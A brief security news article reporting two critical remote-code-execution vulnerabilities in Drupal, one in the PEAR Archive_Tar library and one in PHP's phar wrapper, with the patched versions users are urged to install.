Developers recommend users to update their systems as soon as possible
The Drupal content management system (CMS) has
just launched two security updates to correct critical vulnerabilities, as reported
by network
security and ethical hacking experts from the International Institute
of Cyber Security. According to reports, if vulnerabilities were to be
exploited, they would allow a malicious user to take control of the affected
system.
Specifically, the update patches are for the
7.x, 8.5.x and 8.6.x versions of Drupal and can be corrected by updating Drupal
to versions 7.62, 8.5.9 or 8.6.6.
The first critical vulnerability, tracked as
CVE-2018-1000888, is related to the implementation of the PEAR Archive_Tar
Library, a plugin developed by third parties, which was also corrected by its
editors. If exploited, this vulnerability could lead to remote code execution, as
reported by network security experts.
The second vulnerability, which does not yet
have a CVE key, is a remote code execution flaw present in the PHP built-in phar
wrapper when performing file operations on an untrusted phar://URI. This could
cause a problem when some Drupal codes, such as core, contrib, or custom, could
be performing file operations on a user input that was not sufficiently
validated, leaving them exposed to this vulnerability.
Although these vulnerabilities have been
considered critical, not everything is bad news. According to experts in
network security, there is no evidence that security failures have been
exploited in real environments, as their exploitation is complex because
administrator privileges are required in vulnerable systems.
